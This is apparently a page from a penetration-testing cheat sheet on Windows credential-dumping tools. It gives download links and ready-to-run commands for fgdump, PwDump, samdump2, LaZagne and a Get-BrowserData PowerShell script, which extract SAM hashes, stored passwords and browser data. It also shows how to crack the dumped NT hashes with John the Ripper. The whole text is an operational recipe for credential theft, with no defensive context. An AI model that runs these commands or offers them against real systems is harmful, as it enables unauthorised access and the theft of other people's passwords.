Other Tools / Techniques

credential editor

This tool can be used to extract credentials from the memory. Download it from:

https://www.ampliasecurity.com/research/windows-credentials-editor/www.ampliasecurity.com

fgdump

Extract credentials from the SAM file. You can find this binary inside Kali, just do:

 locate fgdump.exe

then run it on windows:

fgdump.exe

PwDump

Extract credentials from the SAM file

You can find this binary inside Kali, just do:

locate pwdump.exe

run it on windows with:

PwDump.exe -o outpwdump -x 127.0.0.1
type outpwdump

Generate a hash file for John using pwdump or samdump2

pwdump SYSTEM SAM > /root/sam.txt
samdump2 SYSTEM SAM -o sam.txt

Then crack it with:

john -format=NT /root/sam.txt

PwDump7

Tarasco Security: Password Dumper - PwDump 7 for Windows

Lazagne

Releases · AlessandroZ/LaZagneGitHub

GitHub - AlessandroZ/LaZagne: Credentials recovery projectGitHub

lazagne.exe all

get-browserdata(powershell)

https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Get-BrowserData.ps1

Get-BrowserData.ps1 | Format-List